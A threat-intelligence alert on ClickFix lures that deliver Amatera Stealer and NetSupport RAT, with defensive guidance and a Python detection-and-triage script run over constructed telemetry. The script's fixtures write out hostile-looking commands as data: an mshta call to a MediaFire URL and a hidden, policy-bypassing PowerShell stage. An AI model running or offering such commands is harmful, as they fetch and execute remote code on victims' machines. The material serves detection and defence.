🔴 HIGH intel

EVALUSION ClickFix lures drop Amatera Stealer and NetSupport RAT

Category: Threat Alerts
EVALUSION ClickFix phishing campaigns are delivering Amatera Stealer and NetSupport RAT through deceptive reCAPTCHA-like prompts and abuse of the Windows Run dialog, mapping to ATT&CK techniques T1566 (Phishing), T1059.001 (PowerShell), T1105 (Ingress Tool Transfer) and T1555 (Credentials from Password Stores). Researchers observed victims being funneled to bogus pages that claim a reCAPTCHA verification is required and instruct them to paste and run a command in the Windows Run dialog. That command chains mshta and PowerShell to pull a .NET payload from MediaFire, which in turn loads Amatera via a PureCrypter-packed DLL injected into the MSBuild process.

Amatera, an evolution of the ACR stealer sold under a malware-as-a-service model, targets crypto wallets, browsers, messaging applications, FTP clients and email services, exfiltrating credentials and wallet data to attacker-controlled infrastructure. It uses WoW64 syscalls and other evasion techniques to bypass the user-mode hooks placed by sandboxes, antivirus and EDR solutions. Once Amatera has run, it issues a PowerShell command to retrieve and execute NetSupport RAT, but only if it detects that the host is domain-joined or holds files of apparent value such as crypto wallets. That conditional logic lets the actors conserve infrastructure and focus on the more lucrative endpoints.

From a business impact perspective, the combination of stealer and RAT enables both rapid credential theft and longer-term remote control of compromised machines, increasing the risk of account takeover, business email compromise and follow-on ransomware or fraud. The use of widely trusted services such as MediaFire for hosting, together with browser-like checks mimicking Cloudflare Turnstile and Booking.com CAPTCHA flows, makes these lures highly convincing and hard for users to distinguish from legitimate security prompts.

Organizations that have not trained staff against this ClickFix pattern may see users willingly execute the very commands that establish the compromise. Defenders should update phishing training and internal advisories to explicitly call out ClickFix-style lures that ask users to type or paste commands, and establish a strict policy that no legitimate service will ever require use of the Windows Run dialog. Where feasible, the "Remove Run menu from Start Menu" Group Policy disables the dialog outright; it does not prevent pasting into a terminal or the File Explorer address bar, so it complements training rather than replacing it. Detection engineering teams should monitor for mshta spawning PowerShell, for mshta or PowerShell launched directly from explorer.exe (the Run dialog's parent process) with a URL on the command line, for MSBuild hosting untrusted .NET assemblies or making network connections, and for outbound connections from script hosts to cloud file hosting providers, consistent with T1059.001, T1105 and the T1555 credential theft that follows. During triage, the Run dialog's RunMRU key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU) retains pasted commands and is a quick artifact for confirming a ClickFix entry point. Where Amatera or NetSupport are suspected, security teams should treat all credentials, session cookies and wallet keys on affected systems as compromised, reset them at scale and scrutinize lateral movement and persistence mechanisms.

🎯CORTEX Protocol Intelligence Assessment

Business Impact: The EVALUSION ClickFix campaigns weaponize convincing CAPTCHA style flows to trick even security aware users into executing malicious commands, leading directly to credential theft, wallet compromise and remote access. Successful infections can cascade into business email compromise, account hijacking and financially motivated abuse across corporate and personal accounts, with regulatory exposure when customer or employee data is accessed.

Strategic Intelligence Guidance

  • Add ClickFix style social engineering patterns to security awareness content, making it explicit that staff must never run commands from the Windows Run dialog on instruction from web pages.
  • Deploy detections for mshta spawning PowerShell and MSBuild loading unexpected .NET assemblies, and monitor for outbound connections to newly seen cloud file hosting domains.
  • Treat endpoints infected with Amatera or NetSupport as fully compromised, forcing password and token resets for all accounts used on those systems and revoking remembered sessions.
  • Segment high value systems and enforce least privilege so that even if stealer malware runs on a user endpoint, it cannot directly access administrative credentials or critical back end systems.
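The detection guidance above (the monitoring paragraph in the alert and the second bullet) run over constructed telemetry, as an added example that is not part of the eSentire report or this advisory: it flags the mshta to PowerShell hop, a script host launched from explorer.exe (the Run dialog's parent) with a URL on its command line, MSBuild started by a non-build parent with no project file, and outbound connections from script hosts or MSBuild to file-hosting domains, then triages a RunMRU snapshot for the pasted command. The events, registry values, hostnames, URLs, the domain watchlist, the list of legitimate MSBuild parents and the rule names are all constructed assumptions to tune per environment.

```python
"""Detection and triage logic for the EVALUSION ClickFix chain.

Added example, not code from eSentire or CORTEX Protocol. All telemetry and
registry values below are constructed (fictional hosts, users and URLs); the
watchlists and rule names are assumptions, not indicators from the report.
"""
import re
from dataclasses import dataclass

# Hypothetical file-hosting watchlist; only MediaFire is named in the report.
FILE_HOSTS = ("mediafire.com", "dropbox.com", "drive.google.com")
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
NET_WATCH = SCRIPT_HOSTS | {"msbuild.exe"}
# Assumed legitimate parents of MSBuild.exe in this fleet; tune per environment.
BUILD_PARENTS = {"devenv.exe", "dotnet.exe", "msbuild.exe"}
URL_RE = re.compile(r"https?://", re.I)
PROJECT_RE = re.compile(r"\.(sln|csproj|vbproj|proj)\b", re.I)


@dataclass
class Event:
    kind: str               # "process" (creation) or "network" (outbound connection)
    host: str
    image: str              # full path of the process
    parent_image: str = ""  # full path of the parent (process events only)
    cmdline: str = ""       # command line (process events only)
    dest: str = ""          # destination host name (network events only)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (host, rule, detail) tuples for events matching the ClickFix chain."""
    findings = []
    for e in events:
        img, parent = basename(e.image), basename(e.parent_image)
        if e.kind == "process":
            # Run dialog commands are spawned by explorer.exe; a script host with a
            # URL on its command line from that parent is the ClickFix entry point.
            if parent == "explorer.exe" and img in SCRIPT_HOSTS and URL_RE.search(e.cmdline):
                findings.append((e.host, "run_dialog_script_host_with_url", e.cmdline))
            # mshta -> PowerShell: T1218.005 (Mshta) chaining into T1059.001.
            if parent == "mshta.exe" and img in {"powershell.exe", "pwsh.exe"}:
                findings.append((e.host, "mshta_spawned_powershell", e.cmdline))
            # MSBuild hosting an injected assembly: non-build parent and no project to build.
            if img == "msbuild.exe" and parent not in BUILD_PARENTS and not PROJECT_RE.search(e.cmdline):
                findings.append((e.host, "msbuild_without_project", f"parent={parent}"))
        elif e.kind == "network":
            # T1105: script hosts or MSBuild reaching file-hosting services.
            if img in NET_WATCH and e.dest.lower().endswith(FILE_HOSTS):
                findings.append((e.host, "script_host_to_file_hosting", f"{img} -> {e.dest}"))
    return findings


def triage_runmru(values):
    """Return suspicious Run dialog history, most recent first.

    `values` mirrors HKCU\\...\\Explorer\\RunMRU: single-letter value names hold
    "<command>\\1" and MRUList lists those names in most-recent-first order.
    """
    hits = []
    for name in values.get("MRUList", ""):
        raw = values.get(name, "")
        cmd = raw[:-2] if raw.endswith("\\1") else raw
        if not cmd.strip():
            continue
        tok = cmd.split()[0].lower()
        exe = tok if tok.endswith(".exe") else tok + ".exe"
        if exe in SCRIPT_HOSTS or URL_RE.search(cmd):
            hits.append(cmd)
    return hits


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
MSBUILD = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
EVENTS = [  # constructed telemetry in Sysmon EID 1/3 shape, not real logs
    Event("process", "ws01", r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
          "mshta https://www.mediafire.com/file/EXAMPLE/verify"),
    Event("process", "ws01", PS, r"C:\Windows\System32\mshta.exe",
          'powershell -w hidden -ep bypass -c "<constructed stage-2 loader>"'),
    Event("process", "ws01", MSBUILD, PS, "MSBuild.exe"),
    Event("network", "ws01", MSBUILD, dest="www.mediafire.com"),
    # Benign noise: a developer build, a plain Run-dialog PowerShell, a browser download.
    Event("process", "build01", MSBUILD, r"C:\Program Files\Microsoft Visual Studio\devenv.exe",
          "MSBuild.exe app.csproj /t:Build"),
    Event("process", "ws02", PS, r"C:\Windows\explorer.exe", "powershell"),
    Event("network", "ws02", r"C:\Program Files\Google\Chrome\Application\chrome.exe",
          dest="www.mediafire.com"),
]
RUNMRU = {  # constructed snapshot in the shape of real RunMRU values
    "MRUList": "ba",
    "a": "notepad\\1",
    "b": "mshta https://www.mediafire.com/file/EXAMPLE/verify\\1",
}

if __name__ == "__main__":
    for host, rule, detail in detect(EVENTS):
        print(f"{host}: {rule}: {detail}")
    print("RunMRU:", triage_runmru(RUNMRU))
```

Only ws01 produces findings; the build agent's MSBuild run and the browser's download to the same domain stay silent, which is the point of keying on parent process and command line rather than on the domain alone.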

Vendors

eSentire

Threats

EVALUSION
Amatera Stealer
NetSupport RAT
PureCrypter

Targets

enterprise Windows endpoints
crypto wallet users
corporate email users
small and midsize businesses